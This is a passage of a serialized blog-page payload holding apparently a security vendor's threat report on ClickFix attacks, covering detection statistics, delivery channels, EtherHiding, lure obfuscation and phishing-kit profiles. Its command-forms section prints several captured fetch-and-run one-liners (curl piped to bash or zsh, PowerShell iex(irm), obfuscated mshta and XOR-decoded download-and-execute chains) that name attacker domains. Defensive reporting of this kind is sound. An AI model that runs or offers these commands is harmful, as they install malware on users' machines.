far.","2026-08-10T00:00:00.000Z","browser-threat-landscape-mid-year-update-2026",{"items":3643},[3644,3646],{"sys":3645,"name":1833},{"id":1832},{"sys":3647,"name":1837},{"id":1836},{"items":3649},[3650],{"fullName":1841,"firstName":1842,"jobTitle":1843,"profilePicture":3651},{"url":1845},"proofpoint-x-push-partnership-announcement","blog\u002Fproofpoint-x-push-partnership-announcement",{"json":3655},{"data":3656,"content":3657,"nodeType":691},{},[3658],{"data":3659,"content":3660,"nodeType":695},{},[3661],{"data":3662,"marks":3663,"value":3664,"nodeType":699},{},[],"Push Security is partnering with Proofpoint, bringing Push’s in-browser threat protection to Proofpoint customers to tackle browser-native threats as phishing moves beyond the inbox.","Push Security is partnering with Proofpoint, bringing Push’s in-browser threat protection to Proofpoint customers.",{"id":3667,"publishedAt":3668},"2W68nOLYgy1TpDqV5yWdRT","2026-09-29T13:14:07.230Z",{"items":3670},[3671],{"sys":3672,"name":3674},{"id":3673},"4EtskIWlj3SOH3UHbFR8uG","Company news",{"items":3676},[3677,3681,3685,3690,3695,3700,3705,3710],{"sys":3678,"name":245,"slug":3680,"tier":31},{"id":3679},"topic-phishing","phishing",{"sys":3682,"name":2331,"slug":3684,"tier":31},{"id":3683},"topic-browser-security","browser-security",{"sys":3686,"name":3688,"slug":3689,"tier":45},{"id":3687},"topic-bec","BEC","bec",{"sys":3691,"name":3693,"slug":3694,"tier":45},{"id":3692},"topic-non-email-phishing","Non-email phishing","non-email-phishing",{"sys":3696,"name":3698,"slug":3699,"tier":45},{"id":3697},"topic-enterprise-browser","Enterprise browser","enterprise-browser",{"sys":3701,"name":3703,"slug":3704,"tier":45},{"id":3702},"topic-social-engineering","Social engineering","social-engineering",{"sys":3706,"name":3708,"slug":3709,"tier":31},{"id":3707},"topic-browser-attacks","Browser attacks","browser-attacks",{"sys":3711,"name":1837,"slug":3713,"tier":31},{"id":3712},"topic-detection-and-response","detection-and-response","gp-_S51yH6Q3KAfuYBZcV0wNg8eZ37HBVjqYYMBqyww",{"id":3716,"title":3717,"authorsCollection":3718,"content":3724,"extension":942,"faqItemsCollection":5173,"faqTitle":60,"featured":6,"hashTags":60,"meta":5175,"metaTitle":5176,"ogImage":60,"postType":5177,"publishedDate":5178,"relatedBlogPostsCollection":5179,"slug":7784,"stem":7785,"subtitle":60,"summary":7786,"synopsis":7797,"sys":7798,"tagsCollection":7801,"topicsCollection":7805,"__hash__":7854},"blog\u002Fblog\u002Fthe-state-of-clickfix-by-detection-data.json","The state of ClickFix: what Push detection data tells us in H2 2026",{"items":3719},[3720],{"fullName":1841,"firstName":1842,"jobTitle":1843,"socialLinks":3721,"profilePicture":3723},[3722],"https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fdaniel-g-\u002F",{"url":1845},{"json":3725,"links":4975},{"nodeType":691,"data":3726,"content":3727},{},[3728,3736,3743,3750,3758,3779,3785,3792,3795,3803,3819,3826,3834,3841,3910,3918,3925,3948,3955,3962,3968,3975,3993,3999,4074,4080,4111,4114,4122,4130,4137,4157,4164,4170,4178,4185,4191,4199,4206,4213,4219,4226,4232,4238,4245,4251,4257,4265,4272,4295,4302,4309,4315,4318,4326,4333,4462,4468,4471,4479,4487,4494,4506,4512,4515,4523,4547,4558,4564,4572,4579,4586,4592,4600,4607,4614,4620,4623,4631,4638,4661,4668,4671,4679,4686,4969],{"nodeType":725,"data":3729,"content":3730},{},[3731],{"nodeType":699,"value":3732,"marks":3733,"data":3735},"The big picture: the numbers behind ClickFix detections",[3734],{"type":707},{},{"nodeType":695,"data":3737,"content":3738},{},[3739],{"nodeType":699,"value":3740,"marks":3741,"data":3742},"Since rising to prominence in 2024, ClickFix has continued to gather momentum as one of the go-to initial access techniques used by attackers in the wild. Last year, Microsoft reported that ClickFix was the top initial access vector recorded in its detection data, at 47% of detections. The technique is now firmly embedded in both criminal and nation-state affiliated operations around the world. ",[],{},{"nodeType":695,"data":3744,"content":3745},{},[3746],{"nodeType":699,"value":3747,"marks":3748,"data":3749},"But with continued evolution in the form of new sub-techniques, new execution surfaces and payloads, and more advanced infrastructure and tooling (something we’ve seen across the board with increased levels of AI-assisted tool development adding speed and scale), this problem is only getting worse for security teams. ",[],{},{"nodeType":695,"data":3751,"content":3752},{},[3753],{"nodeType":699,"value":3754,"marks":3755,"data":3757},"Through Q2, ClickFix made up an average of 52% of Push’s detections, surpassing other browser-based attacks (predominantly AiTM and device code phishing) for the first time. And in August, this figure reached 67%. ",[3756],{"type":707},{},{"nodeType":695,"data":3759,"content":3760},{},[3761,3765,3770,3774],{"nodeType":699,"value":3762,"marks":3763,"data":3764},"Of those detections, ",[],{},{"nodeType":699,"value":3766,"marks":3767,"data":3769},"three specific phishing kits made up 73%",[3768],{"type":707},{},{"nodeType":699,"value":3771,"marks":3772,"data":3773},": ERRTRAFFIC, TURNTIP, and NOCHAIN. (TURNTIP and NOCHAIN are Push’s internal names for kits that have not been publicly linked to a named kit or service). ",[],{},{"nodeType":699,"value":3775,"marks":3776,"data":3778},"ERRTRAFFIC was the largest in August, making up 34% of ClickFix detections. ",[3777],{"type":707},{},{"nodeType":1041,"data":3780,"content":3784},{"target":3781},{"sys":3782},{"id":3783,"type":1046,"linkType":1047},"5jbMODjCUMHnIfLQYsd3Ow",[],{"nodeType":695,"data":3786,"content":3787},{},[3788],{"nodeType":699,"value":3789,"marks":3790,"data":3791},"More information on the specifics of these kits a little later. ",[],{},{"nodeType":721,"data":3793,"content":3794},{},[],{"nodeType":769,"data":3796,"content":3797},{},[3798],{"nodeType":699,"value":3799,"marks":3800,"data":3802},"Delivery continues to favor non-email channels",[3801],{"type":707},{},{"nodeType":695,"data":3804,"content":3805},{},[3806,3810,3815],{"nodeType":699,"value":3807,"marks":3808,"data":3809},"Notably, ClickFix remains a trap that users fall into rather than something they’re targeted with directly. ",[],{},{"nodeType":699,"value":3811,"marks":3812,"data":3814},"4 in 5 ClickFix payloads intercepted by Push in 2026 are accessed from search engines like Google and Bing",[3813],{"type":707},{},{"nodeType":699,"value":3816,"marks":3817,"data":3818},": the result of compromised sites, malvertising, and SEO poisoning. This sits significantly above the average, with around half of the attacks detected by Push coming via non-email channels.",[],{},{"nodeType":695,"data":3820,"content":3821},{},[3822],{"nodeType":699,"value":3823,"marks":3824,"data":3825},"The other delivery channels recorded include email, messenger apps, social media, inside business apps like SharePoint, and many more. ",[],{},{"nodeType":695,"data":3827,"content":3828},{},[3829],{"nodeType":699,"value":3830,"marks":3831,"data":3833},"This naturally means they completely bypass email-based security controls.",[3832],{"type":707},{},{"nodeType":695,"data":3835,"content":3836},{},[3837],{"nodeType":699,"value":3838,"marks":3839,"data":3840},"This is supported by external reporting. Multiple separate campaigns have been reported involving large-scale compromise of legitimate sites, such as:",[],{},{"nodeType":1589,"data":3842,"content":3843},{},[3844,3866,3888],{"nodeType":1593,"data":3845,"content":3846},{},[3847],{"nodeType":695,"data":3848,"content":3849},{},[3850,3853,3862],{"nodeType":699,"value":21,"marks":3851,"data":3852},[],{},{"nodeType":791,"data":3854,"content":3856},{"uri":3855},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fover-5-400-hacked-sites-serve-clickfix-payloads-stored-on-the-blockchain\u002F",[3857],{"nodeType":699,"value":3858,"marks":3859,"data":3861},"5,400+ compromised small-business sites",[3860],{"type":799},{},{"nodeType":699,"value":3863,"marks":3864,"data":3865}," across 2,200+ organizations were documented serving ClickFix payloads stored on the blockchain (a technique known as Etherhiding, which we’ll discuss later). ",[],{},{"nodeType":1593,"data":3867,"content":3868},{},[3869],{"nodeType":695,"data":3870,"content":3871},{},[3872,3875,3884],{"nodeType":699,"value":21,"marks":3873,"data":3874},[],{},{"nodeType":791,"data":3876,"content":3878},{"uri":3877},"https:\u002F\u002Fwww.derp.ca\u002Fresearch\u002Fta2726-wordpress-malware-launchpads\u002F",[3879],{"nodeType":699,"value":3880,"marks":3881,"data":3883},"1,509 WordPress sites",[3882],{"type":799},{},{"nodeType":699,"value":3885,"marks":3886,"data":3887}," were documented feeding SocGholish\u002FClickFix chains in July 2026.",[],{},{"nodeType":1593,"data":3889,"content":3890},{},[3891],{"nodeType":695,"data":3892,"content":3893},{},[3894,3897,3906],{"nodeType":699,"value":21,"marks":3895,"data":3896},[],{},{"nodeType":791,"data":3898,"content":3900},{"uri":3899},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F05\u002Fghost-cms-cve-2026-26980-exploited-to.html",[3901],{"nodeType":699,"value":3902,"marks":3903,"data":3905},"700+ Ghost CMS sites",[3904],{"type":799},{},{"nodeType":699,"value":3907,"marks":3908,"data":3909}," were compromised via CVE-2026-26980 in May 2026 and infected with ClickFix payloads.",[],{},{"nodeType":769,"data":3911,"content":3912},{},[3913],{"nodeType":699,"value":3914,"marks":3915,"data":3917},"LOLBINs and execution surfaces are broadening",[3916],{"type":707},{},{"nodeType":695,"data":3919,"content":3920},{},[3921],{"nodeType":699,"value":3922,"marks":3923,"data":3924},"We see a huge variance in commands and execution surfaces targeted. ",[],{},{"nodeType":1589,"data":3926,"content":3927},{},[3928,3938],{"nodeType":1593,"data":3929,"content":3930},{},[3931],{"nodeType":695,"data":3932,"content":3933},{},[3934],{"nodeType":699,"value":3935,"marks":3936,"data":3937},"84 distinct command forms observed, and 34 seen only once. ",[],{},{"nodeType":1593,"data":3939,"content":3940},{},[3941],{"nodeType":695,"data":3942,"content":3943},{},[3944],{"nodeType":699,"value":3945,"marks":3946,"data":3947},"20+ binaries including PowerShell, echo, base64, bash, curl, mshta, cmd, zsh, conhost, rundll32, msiexec, pcalua, net, wmic, sh, eval, cscript, wscript, certutil, and schtasks.",[],{},{"nodeType":695,"data":3949,"content":3950},{},[3951],{"nodeType":699,"value":3952,"marks":3953,"data":3954},"echo, base64, and openssl appear frequently as plumbing (decoding or printing data within a command chain rather than executing it), while msiexec, rundll32, pcalua, finger, and others each appear in a handful of payloads, reflecting the LOLBin rotation pattern where operators cycle through trusted binaries to stay ahead of endpoint detection rules. ",[],{},{"nodeType":695,"data":3956,"content":3957},{},[3958],{"nodeType":699,"value":3959,"marks":3960,"data":3961},"Since the main kits all read their configuration from a contract rather than the page, payload and lure are fetched at load and can be swapped without the page changing. ",[],{},{"nodeType":1041,"data":3963,"content":3967},{"target":3964},{"sys":3965},{"id":3966,"type":1046,"linkType":1047},"1GylosLougBNAuvqMGGpSW",[],{"nodeType":695,"data":3969,"content":3970},{},[3971],{"nodeType":699,"value":3972,"marks":3973,"data":3974},"Some of the common command forms we’ve captured include:",[],{},{"nodeType":1589,"data":3976,"content":3977},{},[3978],{"nodeType":1593,"data":3979,"content":3980},{},[3981],{"nodeType":695,"data":3982,"content":3983},{},[3984,3989],{"nodeType":699,"value":3985,"marks":3986,"data":3988},"macOS\u002FLinux. ",[3987],{"type":707},{},{"nodeType":699,"value":3990,"marks":3991,"data":3992},"The most primitive shape we see. A base64 blob is decoded inline and fed straight into bash through a herestring. The decoded text is itself a curl download piped to bash. bash \u003C\u003C\u003C $(echo \"Y3VybCAtcyAnaHR0cHM6Ly9zeXN0ZW1sb2dpY29wY29wdGltaXplci5jb21sd…\" | base64 -d)",[],{},{"nodeType":1041,"data":3994,"content":3998},{"target":3995},{"sys":3996},{"id":3997,"type":1046,"linkType":1047},"1yFYXNAZjBiQagdh9c0lCz",[],{"nodeType":1589,"data":4000,"content":4001},{},[4002,4017,4031,4046,4060],{"nodeType":1593,"data":4003,"content":4004},{},[4005],{"nodeType":695,"data":4006,"content":4007},{},[4008,4013],{"nodeType":699,"value":4009,"marks":4010,"data":4012},"Windows.",[4011],{"type":707},{},{"nodeType":699,"value":4014,"marks":4015,"data":4016}," PowerShell fetches a script from a bare IP address (masked here) and runs it in memory, never touching disk. powershell -c iex(irm \u003Cip> -UseBasicParsing)",[],{},{"nodeType":1593,"data":4018,"content":4019},{},[4020],{"nodeType":695,"data":4021,"content":4022},{},[4023,4027],{"nodeType":699,"value":4009,"marks":4024,"data":4026},[4025],{"type":707},{},{"nodeType":699,"value":4028,"marks":4029,"data":4030}," Fetch-and-run one-liner — PowerShell downloads from a hostname and executes in memory. powershell iex(irm wirelesswebdevice.com -UseBasicParsing)",[],{},{"nodeType":1593,"data":4032,"content":4033},{},[4034],{"nodeType":695,"data":4035,"content":4036},{},[4037,4042],{"nodeType":699,"value":4038,"marks":4039,"data":4041},"macOS\u002FLinux.",[4040],{"type":707},{},{"nodeType":699,"value":4043,"marks":4044,"data":4045}," The URL is hidden in base64, decoded by openssl, fetched with curl and piped into zsh. curl -s $(echo \"aHR0cHM6Ly9xdWVzdC0yMi5jb20vY3VybC8wNHRncXNpM3…\" | openssl base64 -d -A) | zsh",[],{},{"nodeType":1593,"data":4047,"content":4048},{},[4049],{"nodeType":695,"data":4050,"content":4051},{},[4052,4056],{"nodeType":699,"value":4038,"marks":4053,"data":4055},[4054],{"type":707},{},{"nodeType":699,"value":4057,"marks":4058,"data":4059}," A decoy line impersonating an OpenAI Codex install is echoed first, then the real command decodes a base64 URL and pipes curl into zsh. echo \"npm install -g @openai\u002Fcodex https:\u002F\u002Fopenai.com\u002Fcodex\u002F\" && curl -s $(echo \"aHR0cHM6Ly9xdWVzdC0yMi5jb20vY3VybC8wNHRqd…\" | openssl base64 -d -A) | zsh",[],{},{"nodeType":1593,"data":4061,"content":4062},{},[4063],{"nodeType":695,"data":4064,"content":4065},{},[4066,4070],{"nodeType":699,"value":4009,"marks":4067,"data":4069},[4068],{"type":707},{},{"nodeType":699,"value":4071,"marks":4072,"data":4073}," A launcher chain: pcalua starts PowerShell, which starts cmd, which runs mshta. The mshta and the URL are caret-split so neither matches as a string. pcalua -a \"PowerShell\" -c \"saps cmd '\u002Fv\u002Fc m^s^h^t^a h^t^t^p^s^:^\u002F^\u002Ffine-work-team.com\u002F6272' -Wi Hi\"",[],{},{"nodeType":1041,"data":4075,"content":4079},{"target":4076},{"sys":4077},{"id":4078,"type":1046,"linkType":1047},"4LWBMsmwySzy1Ux6B13umE",[],{"nodeType":1589,"data":4081,"content":4082},{},[4083,4097],{"nodeType":1593,"data":4084,"content":4085},{},[4086],{"nodeType":695,"data":4087,"content":4088},{},[4089,4093],{"nodeType":699,"value":4009,"marks":4090,"data":4092},[4091],{"type":707},{},{"nodeType":699,"value":4094,"marks":4095,"data":4096}," A character array is XOR-decoded at runtime to rebuild the URL, then Invoke-WebRequest writes an executable into TEMP and runs it. The URL never appears as text. powershell -nop -w h -c \"$uXsp=([char[]]@(88,68,68,64,10,31,31,9,4,30,1,0,3,30,1,30,1,7,5,10,1,6,4,8,2,31,66,69,94,68,89,93,85,111,5,6,7,83,7,86,7,9,30,85,72,85)|%{[char]($_-bxor48)})-join'';iwr $uXsp -Out $env:TEMP\\u.exe;&$env:TEMP\\u.exe\"",[],{},{"nodeType":1593,"data":4098,"content":4099},{},[4100],{"nodeType":695,"data":4101,"content":4102},{},[4103,4107],{"nodeType":699,"value":4009,"marks":4104,"data":4106},[4105],{"type":707},{},{"nodeType":699,"value":4108,"marks":4109,"data":4110}," A cmd one-liner that hides the binary name with caret escaping and uses a for-loop to execute whatever the command returns. %COMSPEC% \u002Fc s^t^a^r^t \"\" \u002Fmin for \u002Ff \"delims=@\" %o in (',f^^i^^n^^g^^e^^r ksqALiwYXQ@f^^i^^n^^g^^e^^r^^.^^linkedinsig.com') do %o & '…'",[],{},{"nodeType":721,"data":4112,"content":4113},{},[],{"nodeType":725,"data":4115,"content":4116},{},[4117],{"nodeType":699,"value":4118,"marks":4119,"data":4121},"Trending techniques",[4120],{"type":707},{},{"nodeType":769,"data":4123,"content":4124},{},[4125],{"nodeType":699,"value":4126,"marks":4127,"data":4129},"EtherHiding",[4128],{"type":707},{},{"nodeType":695,"data":4131,"content":4132},{},[4133],{"nodeType":699,"value":4134,"marks":4135,"data":4136},"EtherHiding is where instead of fetching its configuration from a web server, the kit reads it from a smart contract on a public blockchain. There is no host to take down and no domain to block, and the operator changes what is served by writing a transaction.",[],{},{"nodeType":695,"data":4138,"content":4139},{},[4140,4144,4153],{"nodeType":699,"value":4141,"marks":4142,"data":4143},"EtherHiding has been observed across multiple kits and is operating at substantial scale in the wild. ",[],{},{"nodeType":791,"data":4145,"content":4147},{"uri":4146},"https:\u002F\u002Fwww.netskope.com\u002Fblog\u002Fmalware-on-the-blockchain-an-ongoing-campaigns-new-webrtc-twist",[4148],{"nodeType":699,"value":4149,"marks":4150,"data":4152},"Netskope documented an ongoing campaign",[4151],{"type":799},{},{"nodeType":699,"value":4154,"marks":4155,"data":4156}," across 5,400+ compromised websites retrieving payloads from a single BNB Smart Chain testnet smart contract — at zero cost to the operator. Updating that one contract changes what every site delivers, and the blockchain is immune to takedown requests. ",[],{},{"nodeType":695,"data":4158,"content":4159},{},[4160],{"nodeType":699,"value":4161,"marks":4162,"data":4163},"The networks observed by Push include BNB Smart Chain testnet, Polygon, Base and Ethereum Sepolia, reached through ordinary public RPC providers, with most of the traffic on testnets. ",[],{},{"nodeType":1041,"data":4165,"content":4169},{"target":4166},{"sys":4167},{"id":4168,"type":1046,"linkType":1047},"mNMfocLNw54H4UTCACe7D",[],{"nodeType":769,"data":4171,"content":4172},{},[4173],{"nodeType":699,"value":4174,"marks":4175,"data":4177},"Adoption of Win+X",[4176],{"type":707},{},{"nodeType":695,"data":4179,"content":4180},{},[4181],{"nodeType":699,"value":4182,"marks":4183,"data":4184},"Kits instruct the victim through Win+R, through Win+X, or through Terminal on macOS. We’re seeing kits use a combination of both in our detections. The Run dialog (Win+R) opens a user-level shell. Win+X then I opens PowerShell or Terminal as administrator.",[],{},{"nodeType":1041,"data":4186,"content":4190},{"target":4187},{"sys":4188},{"id":4189,"type":1046,"linkType":1047},"7tnN7yTCXvYR9dQCmF1KvX",[],{"nodeType":769,"data":4192,"content":4193},{},[4194],{"nodeType":699,"value":4195,"marks":4196,"data":4198},"AI-themed lures",[4197],{"type":707},{},{"nodeType":695,"data":4200,"content":4201},{},[4202],{"nodeType":699,"value":4203,"marks":4204,"data":4205},"We’ve seen a rise in attacks targeting developer and AI tooling as part of the deception, capitalizing on AI adoption trends. ",[],{},{"nodeType":695,"data":4207,"content":4208},{},[4209],{"nodeType":699,"value":4210,"marks":4211,"data":4212},"First, we saw attackers weaponizing malvertised install guides for popular tools like Claude Code and NotebookLM (which doesn’t even have a legit installer).",[],{},{"nodeType":1041,"data":4214,"content":4218},{"target":4215},{"sys":4216},{"id":4217,"type":1046,"linkType":1047},"17od6VoYRdCC2nEHONs7lF",[],{"nodeType":695,"data":4220,"content":4221},{},[4222],{"nodeType":699,"value":4223,"marks":4224,"data":4225},"Then, attackers took it a step further by generating artifacts using popular LLMs like ChatGPT and Claude, placing more malicious ads with the link to their shared chat.",[],{},{"nodeType":1041,"data":4227,"content":4231},{"target":4228},{"sys":4229},{"id":4230,"type":1046,"linkType":1047},"38yWqRR5JFSxVxf3pRIyUB",[],{"nodeType":1041,"data":4233,"content":4237},{"target":4234},{"sys":4235},{"id":4236,"type":1046,"linkType":1047},"1uYzrxsVScSyl4JMRgcb9J",[],{"nodeType":695,"data":4239,"content":4240},{},[4241],{"nodeType":699,"value":4242,"marks":4243,"data":4244},"One recent example combines this with a creative Windows update lure — a deception that emerged late in 2025. The victim lands on a copy of the ChatGPT interface in Dutch and clicks Log in. The page goes full-screen and starts a fake Windows Update, ending with a ClickFix lure.",[],{},{"nodeType":1041,"data":4246,"content":4250},{"target":4247},{"sys":4248},{"id":4249,"type":1046,"linkType":1047},"GPBTLT7AtHWtqp4KQJldB",[],{"nodeType":1041,"data":4252,"content":4256},{"target":4253},{"sys":4254},{"id":4255,"type":1046,"linkType":1047},"TUjEtcYzSBSQvocAZz8Sp",[],{"nodeType":769,"data":4258,"content":4259},{},[4260],{"nodeType":699,"value":4261,"marks":4262,"data":4264},"Obfuscation and detection evasion",[4263],{"type":707},{},{"nodeType":695,"data":4266,"content":4267},{},[4268],{"nodeType":699,"value":4269,"marks":4270,"data":4271},"Windows lures often avoid rendering the keystrokes they describe as plain text to defeat text matching, through:",[],{},{"nodeType":1589,"data":4273,"content":4274},{},[4275,4285],{"nodeType":1593,"data":4276,"content":4277},{},[4278],{"nodeType":695,"data":4279,"content":4280},{},[4281],{"nodeType":699,"value":4282,"marks":4283,"data":4284},"Homoglyph substitution — e.g. Р​r​е​ѕ​ѕ​ W​і​n​d​о​w​ѕ​ В​u​t​t​о​n + R, built from Cyrillic lookalikes and zero-width joiners so the words never appear as ASCII.",[],{},{"nodeType":1593,"data":4286,"content":4287},{},[4288],{"nodeType":695,"data":4289,"content":4290},{},[4291],{"nodeType":699,"value":4292,"marks":4293,"data":4294},"Mid-word fragmentation — To prove t \u002F hat \u002F ou a \u002F re not \u002F ro bot, split across elements.",[],{},{"nodeType":695,"data":4296,"content":4297},{},[4298],{"nodeType":699,"value":4299,"marks":4300,"data":4301},"The anti-analysis doesn’t end there. Referrer checks, webdriver and headless-browser detection, canvas and WebGL fingerprinting, one-time links, geo and IP gating, and debugger traps are all common, with unrelated kits drawing down on the same toolkit of evasion techniques. ",[],{},{"nodeType":695,"data":4303,"content":4304},{},[4305],{"nodeType":699,"value":4306,"marks":4307,"data":4308},"ClickFix by design is intended to get around the controls usually designed to stop malware delivery. By using fetch-and-run methods, alongside various forms of obfuscation and encoding, the attacks download a script from a remote host and run it entirely in memory, while masking the urls the script is fetching from. Nothing is written to disk, reducing the detection opportunities, with the actual malicious payload arriving in the second stage. ",[],{},{"nodeType":1041,"data":4310,"content":4314},{"target":4311},{"sys":4312},{"id":4313,"type":1046,"linkType":1047},"3F7xE1eU6zCWeWGqTy8FtM",[],{"nodeType":721,"data":4316,"content":4317},{},[],{"nodeType":769,"data":4319,"content":4320},{},[4321],{"nodeType":699,"value":4322,"marks":4323,"data":4325},"Payload evolution",[4324],{"type":707},{},{"nodeType":695,"data":4327,"content":4328},{},[4329],{"nodeType":699,"value":4330,"marks":4331,"data":4332},"At Push, we’re focused on the upstream ClickFix delivery rather than malware analysis and execution. But endpoint-layer controls are coming under increasing pressure in the face of ClickFix evolution as attackers look to develop new ways of evading controls.",[],{},{"nodeType":1589,"data":4334,"content":4335},{},[4336,4359,4383,4405,4440],{"nodeType":1593,"data":4337,"content":4338},{},[4339],{"nodeType":695,"data":4340,"content":4341},{},[4342,4346,4355],{"nodeType":699,"value":4343,"marks":4344,"data":4345},"ClickFix Payload-as-a-Service (CPaaS) platforms offer ",[],{},{"nodeType":791,"data":4347,"content":4349},{"uri":4348},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F07\u002Fresearcher-analyzes-3000-live-clickfix.html",[4350],{"nodeType":699,"value":4351,"marks":4352,"data":4354},"API-driven backends",[4353],{"type":799},{},{"nodeType":699,"value":4356,"marks":4357,"data":4358}," generating uniquely obfuscated payloads per victim, mapped across ~3,000 live payloads. ",[],{},{"nodeType":1593,"data":4360,"content":4361},{},[4362],{"nodeType":695,"data":4363,"content":4364},{},[4365,4369,4379],{"nodeType":699,"value":4366,"marks":4367,"data":4368},"Russian-origin Loader-as-a-Service ",[],{},{"nodeType":791,"data":4370,"content":4372},{"uri":4371},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-doublecup-clickfix-service-hides-malware-in-browser-cache-images\u002F",[4373],{"nodeType":699,"value":4374,"marks":4375,"data":4378},"DOUBLECUP",[4376,4377],{"type":799},{"type":707},{},{"nodeType":699,"value":4380,"marks":4381,"data":4382}," uses a customer-facing ClickFix builder and steganographic browser cache persistence (payloads encoded in PNG images cached during normal browsing) to evade detection.",[],{},{"nodeType":1593,"data":4384,"content":4385},{},[4386],{"nodeType":695,"data":4387,"content":4388},{},[4389,4393,4401],{"nodeType":699,"value":4390,"marks":4391,"data":4392},"Elastic's research on MimicRAT documents multi-stage PowerShell chains that perform AMSI and ETW bypasses as their first action before dropping further payloads. The ",[],{},{"nodeType":791,"data":4394,"content":4396},{"uri":4395},"https:\u002F\u002Fgbhackers.com\u002Frundll32-and-webdav\u002F",[4397],{"nodeType":699,"value":4398,"marks":4399,"data":4400},"rundll32+WebDAV variant",[],{},{"nodeType":699,"value":4402,"marks":4403,"data":4404}," shows operators moving away from PowerShell entirely to avoid AMSI's coverage.",[],{},{"nodeType":1593,"data":4406,"content":4407},{},[4408],{"nodeType":695,"data":4409,"content":4410},{},[4411,4415,4424,4428,4436],{"nodeType":699,"value":4412,"marks":4413,"data":4414},"Ransomware operator ",[],{},{"nodeType":791,"data":4416,"content":4418},{"uri":4417},"https:\u002F\u002Fransom-isac.org\u002Fblog\u002Fcrpx0-clickfix-ransomware-analysis\u002F",[4419],{"nodeType":699,"value":4420,"marks":4421,"data":4423},"CRPx0",[4422],{"type":799},{},{"nodeType":699,"value":4425,"marks":4426,"data":4427}," uses ClickFix pages as its primary delivery mechanism targeting 30+ victims since July 2026 with focus on healthcare. Halcyon documented ClickFix delivery across ",[],{},{"nodeType":791,"data":4429,"content":4431},{"uri":4430},"https:\u002F\u002Fwww.halcyon.ai\u002Fransomware-research-reports\u002Fclipboard-to-encryption-the-critical-role-of-clickfix-in-ransomware-campaigns",[4432],{"nodeType":699,"value":4433,"marks":4434,"data":4435},"four additional ransomware families",[],{},{"nodeType":699,"value":4437,"marks":4438,"data":4439},": Qilin, Termite, Interlock, and LeakNet.",[],{},{"nodeType":1593,"data":4441,"content":4442},{},[4443],{"nodeType":695,"data":4444,"content":4445},{},[4446,4450,4458],{"nodeType":699,"value":4447,"marks":4448,"data":4449},"The ",[],{},{"nodeType":791,"data":4451,"content":4453},{"uri":4452},"https:\u002F\u002Fcatchingphish.com\u002Fclickexfil-my-iteration-on-clickfix-and-filefix\u002F",[4454],{"nodeType":699,"value":4455,"marks":4456,"data":4457},"ClickExfil PoC",[],{},{"nodeType":699,"value":4459,"marks":4460,"data":4461}," by security researchers demonstrates the use of ClickFix mechanics to exfiltrate files directly rather than deliver malware.",[],{},{"nodeType":1041,"data":4463,"content":4467},{"target":4464},{"sys":4465},{"id":4466,"type":1046,"linkType":1047},"5xAW28WUJPNmfS6URpyQ2D",[],{"nodeType":721,"data":4469,"content":4470},{},[],{"nodeType":725,"data":4472,"content":4473},{},[4474],{"nodeType":699,"value":4475,"marks":4476,"data":4478},"Kit breakdown",[4477],{"type":707},{},{"nodeType":769,"data":4480,"content":4481},{},[4482],{"nodeType":699,"value":4483,"marks":4484,"data":4486},"ERRTRAFFIC",[4485],{"type":707},{},{"nodeType":695,"data":4488,"content":4489},{},[4490],{"nodeType":699,"value":4491,"marks":4492,"data":4493},"ERRTRAFFIC is a commercial Malware-as-a-Service platform priced at $300–380\u002Fmonth, with 11+ confirmed threat actor adopters. It injects itself into compromised websites — predominantly WordPress — and overlays an interchangeable lure picked from a library of faces at load time. Its v3 release upgraded to EtherHiding, reading kit configuration from smart contracts on Polygon via public RPC endpoints, so payload URLs can be rotated with a single blockchain transaction across every compromised site simultaneously. It serves both Windows and macOS instruction sets, adapting to the visitor's OS, and instructs via Win+X rather than Win+R.",[],{},{"nodeType":695,"data":4495,"content":4496},{},[4497,4502],{"nodeType":699,"value":4498,"marks":4499,"data":4501},"Example: ",[4500],{"type":707},{},{"nodeType":699,"value":4503,"marks":4504,"data":4505},"A fake Cloudflare \"Verifying you are human\" screen placed over a compromised site — one of several interchangeable faces this kit picks from at load, which also include a fake blue screen and a missing-font prompt. Step one is Win + X then I, which opens PowerShell or Terminal as administrator. It serves both Windows and macOS, and reads its configuration from a smart contract.",[],{},{"nodeType":1041,"data":4507,"content":4511},{"target":4508},{"sys":4509},{"id":4510,"type":1046,"linkType":1047},"2rV1TMD3mlLU8eT0XfeHGW",[],{"nodeType":721,"data":4513,"content":4514},{},[],{"nodeType":769,"data":4516,"content":4517},{},[4518],{"nodeType":699,"value":4519,"marks":4520,"data":4522},"CLEARFAKE",[4521],{"type":707},{},{"nodeType":695,"data":4524,"content":4525},{},[4526,4530,4543],{"nodeType":699,"value":4527,"marks":4528,"data":4529},"CLEARFAKE is the oldest kit in the set,",[],{},{"nodeType":791,"data":4531,"content":4533},{"uri":4532},"https:\u002F\u002Fkrebsonsecurity.com\u002F2023\u002F10\u002Fthe-fake-browser-update-scam-gets-a-makeover\u002F",[4534,4538],{"nodeType":699,"value":4535,"marks":4536,"data":4537}," ",[],{},{"nodeType":699,"value":4539,"marks":4540,"data":4542},"first identified by researcher Randy McEoin in July 2023",[4541],{"type":799},{},{"nodeType":699,"value":4544,"marks":4545,"data":4546}," — its name comes from the lack of obfuscation in its early JavaScript. It began as a straightforward fake browser update campaign but evolved substantially: by 2025 it had pivoted to ClickFix-style fake reCAPTCHA and Cloudflare Turnstile lures, andadopted  EtherHiding, storing entire payload JavaScript on-chain on the BNB Smart Chain rather than just a URL — so the malicious code is returned in full with no external hosting required.",[],{},{"nodeType":695,"data":4548,"content":4549},{},[4550,4554],{"nodeType":699,"value":4498,"marks":4551,"data":4553},[4552],{"type":707},{},{"nodeType":699,"value":4555,"marks":4556,"data":4557},"The example overlays a compromised publisher's article and blurs the page behind its panel, so the site looks like it is still loading. Its verification line is numeric rather than hex. It serves different instructions per OS, and it reads its configuration on-chain. The same URL served to a Mac gets a different instruction set — \"To better prove you are not a robot, please: Open Terminal…\" instead of the Run dialog. ",[],{},{"nodeType":1041,"data":4559,"content":4563},{"target":4560},{"sys":4561},{"id":4562,"type":1046,"linkType":1047},"7eCIx7NOFvZJTA6mkfbU26",[],{"nodeType":769,"data":4565,"content":4566},{},[4567],{"nodeType":699,"value":4568,"marks":4569,"data":4571},"NOCHAIN",[4570],{"type":707},{},{"nodeType":695,"data":4573,"content":4574},{},[4575],{"nodeType":699,"value":4576,"marks":4577,"data":4578},"NOCHAIN is a fake 